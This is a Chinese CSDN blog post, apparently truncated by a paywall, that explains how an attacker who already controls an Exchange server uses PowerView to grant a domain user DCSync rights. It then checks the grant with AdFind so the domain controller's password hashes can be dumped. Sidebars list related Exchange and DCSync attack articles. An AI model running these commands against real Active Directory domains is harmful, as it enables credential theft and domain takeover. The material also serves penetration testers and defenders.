Exchange writeACL Dcsync连接域控

最新推荐文章于 2023-12-30 17:12:57 发布
最新推荐文章于 2023-12-30 17:12:57 发布
阅读量850 收藏
点赞数
分类专栏: 红蓝对抗-攻防安全 文章标签: 域渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/115350868
版权
本文介绍了如何在已拥有Exchange server权限的情况下,通过修改指定用户的writeACL,执行Dcsync操作来导出域控制器的哈希。使用了PowerSploit中的PowerView脚本,并借助Adfind检查权限写入,以及secretsdump.py工具进行哈希dump。最后,通过psexec连接到域控执行相关操作。
摘要由CSDN通过智能技术生成

已有Exchange server权限,通过给指定用户writeACL 然后Dcsync导出域控哈希

脚本地址如下

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

命令行:

#Empire下的powerview.ps1脚本
Import-Module .\powerview.ps1;
Add-DomainObjectAcl -TargetIdentity 'DC=hacktest,DC=com' -PrincipalIde 域用户 -Rights DCSync -Verbose
 
#移除指定用户的dcsync权限
Remove-DomainObjectAcl -TargetIdentity 'DC= hacktest,DC=com' -PrincipalIde 域用户 -Rights DCSync -Verbose

通过Adfind看是否已经写入aaa用户成功

AdFind.exe -s subtree -b "DC=hacktest,DC=com" nTSecurityDescriptor -sddl -sddlfilter ;;;"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2";; -recmute -resolvesids

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Adsatrtgo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
Exchange Server writeACL Dcsync导出哈希
谢公子的博客
03-08 2689
所有的Exchange Server 默认都在Exchange Windows Permissions组里面而,这个组默认对WriteACL权限。所以当我们拿下Exchange服务器的时候,就可以尝试使用WriteACL赋予自身Dcsync的权限. 使用powerview,为当前exchange机器名用户增加dcsync权限(此处需要使用dev分枝中的powerview) powershell.exe -execbypass -Command"& {Import-Module .powe..
CVE-2021-26858/CVE-2021-27065 Exchange 任意文件写入结合Write Dcsync Acl域控
谢公子的博客
03-14 5152
查询内具备Dcsync权限的用户,可以看到已经有xie\hack了 hack用户拥有dcsync权限后,即可导出内任意用户哈希,导出administrator用户的哈希,远程连接域控
Exchange中的ACL利用分析
lonmar的博客
11-03 602
0x00 安装Exchange服务器后会添加一个名为Microsoft Exchange Security Groups的OU,这个OU里面有一些权限很高的组。 Exchange Trusted Subsystem Exchange Windows Permission Organization Management 下面仔细分析一下 0x01 High Privilege Groups 首先是Exchange Windows Permissions这个组,这个组的权限非常高,它对整个对象拥有Write
Microsoft Exchange Server AD Sync
aozhui7913的博客
01-07 134
关于Exchenge Server,当我们添加不同的功能的时候,最好每一个功能一个服务器,这样的话,坑会少,错误会少一点。比如你计划有AD DS, AD FS, AD Sync,最好分三个服务器来操作,防止出现影响。 而且在操作的时候,一般使用Domain User, 而不是创建好服务器时的administrator账号。 首先做的应该时AD DS,这里先创建一个主服务器,我们叫它D...
投稿 | 使用Exchange服务器中的Writedacl实现提权的提权
Ms08067安全实验室
05-12 753
文章来源|MS08067 公众号读者投稿本文作者:VastSky(Ms08067实验室读者)前言在环境中,如果安装Exchange后,系统会添加一个名为Microsoft Exchang...
win12安装域控Exchange2016.docx
07-06
在IT领,Windows Server 2012 R2与Exchange 2016的集成是企业环境中常见的配置,尤其在小型或中型企业中,为了节省硬件资源,可能会选择在同一台服务器上部署活动目录域控制器(Domain Controller,简称DC)和...
Exchange在接收连接器上启用匿名中继的方法
09-09
主要介绍了Exchange在接收连接器上启用匿名中继的方法,需要的朋友可以参考下
在2012域控下部署EXCHANGE2013服务器实例
02-24
在2012域控下部署,意味着我们需要确保环境满足Exchange 2013的最小系统要求,包括操作系统版本、硬件规格、网络配置以及相应的服务和功能。 1. **规划与准备**: - **环境**: 确保功能级别至少为Windows ...
Exchange 搜索并删除指定邮件
06-06
Exchange服务器环境中,有时需要搜索并删除特定的邮件,特别是在群发邮件误发且无法撤回的情况下。Exchange提供了两种主要的PowerShell命令行工具来实现这一功能:Search-Mailbox和New-MailboxSearch。 首先,...
exchange2016安装教程
12-01
5. **设置边缘同步**:在内部的Active Directory连接服务器上配置边緣同步,使边缘服务器能够获取组织的邮箱信息。 6. **配置防火墙规则**:开放必要的端口以允许SMTP和其他Exchange通信。 7. **设置反垃圾邮件...
集权设施攻防兵法:实战攻防之Exchange
ZAWX_NETSTARSEC的博客
05-25 928
比如,它可以配置邮箱委托,将某个重要的邮箱委托到他所控制的一个不常用的邮箱,这样就可以在不需要凭据的情况下任意查看那个重要邮箱的所有邮件。然而,它也时常受到攻击。比如,在没有凭据的情况下,攻击者可能会尝试利用Proxylogon、Proxyshell等攻击链对Exchange实施攻击,如果攻击成功,能够拿到Exchange的system权限。2.针对CVE漏洞的利用实时监测,目前已经覆盖对Exchange的所有历史漏洞进行实时的攻击检测,确保在针对Exchange的任何漏洞攻击发生时可以看到攻击行为。
春秋云境Exchange WP
最新发布
m0_62466350的博客
12-30 1044
Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对环境核心认证机制的理解,以及掌握环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。*注意:该靶场只有4个flag,如果提交完4个flag后仍未攻克成功,请关闭环境提交反馈。
几个常用的exchange2010脚本
weixin_34221036的博客
08-16 260
查看所有用户的邮箱使用情况并导出到一个txt记事本文件中Get-MailboxStatistics -Server EX -Verbose | Sort-Object totalitemsize -Descending | Format-Table totalitemsize,displayname,itemcount,storagelimitstatus -GroupBy ...
渗透——DCSync
systemino的博客
07-31 7059
0x00 前言 DCSync渗透中经常会用到的技术,本文会对开源的资料进行整理,结合自己的经验,总结利用和防御检测的方法。 0x01 简介 本文将要介绍以下内容: ·利用DCSync导出内所有用户hash的方法。 ·利用DCSync内维持权限的方法。 ·自动化检测DCSync后门的方法。 0x02 利用DCSync导出内所有用户hash的方法 DCSync是mim...
Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581
dengzhasong7076的博客
01-22 2901
前一段时间exchange出现了CVE-2018-8581,搭了许久的环境,不过不得不敬佩这个漏洞整体超赞。 一开始主要还是利用盗取exchange的管理员权限去调用一些接口,导致可以做到,比如收取别人邮件,替别人发送邮件。 攻击域控 今天出了一个更加深入的利用分析 主要是利用了ews推送的ssrf,进行ntlm relay,从http -> ldap的利用。主要还是exchang...
渗透Dcsync
谢公子的博客
10-09 3510
DCSync功能出现之前,要想获得用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得用户的哈希。2015年8月,新版的mimikatz增加了DCSync的功能,该功能可以模仿一个域控DC,从真实的域控中请求数据,如用户的哈希。该功能最大的特点就是可以实现不登录到域控而获取域控上的数据。 在中,不同的DC之间,每隔15分钟会进行一次数据的同步。当一个DC(辅助DC)想从其他DC(主DC)获取数据时,辅助DC会向主DC发起一个GetNCChanges请求。请求的数据包括需要同步的数据。如果需
html抽奖代码_exchange利用(文末附抽奖小活动~)
weixin_35122994的博客
12-27 252
一:利用exchange中的ACL进行提权安装Exchange后默认会自动添加一个名为Microsoft Exchange Security Groups的OU。其中包括两个特殊的组:Exchange Trusted Subsystem和Exchange Windows PermissionExchange Trusted Subsystem是Exchange Windows Permi...
给用户设定ACL权限
m0_68591839的博客
11-17 1835
Linux的acl权限创建
CVE-2019-1040 原理及复现
weixin_44747030的博客
10-07 2050
CVE-2019-1040漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值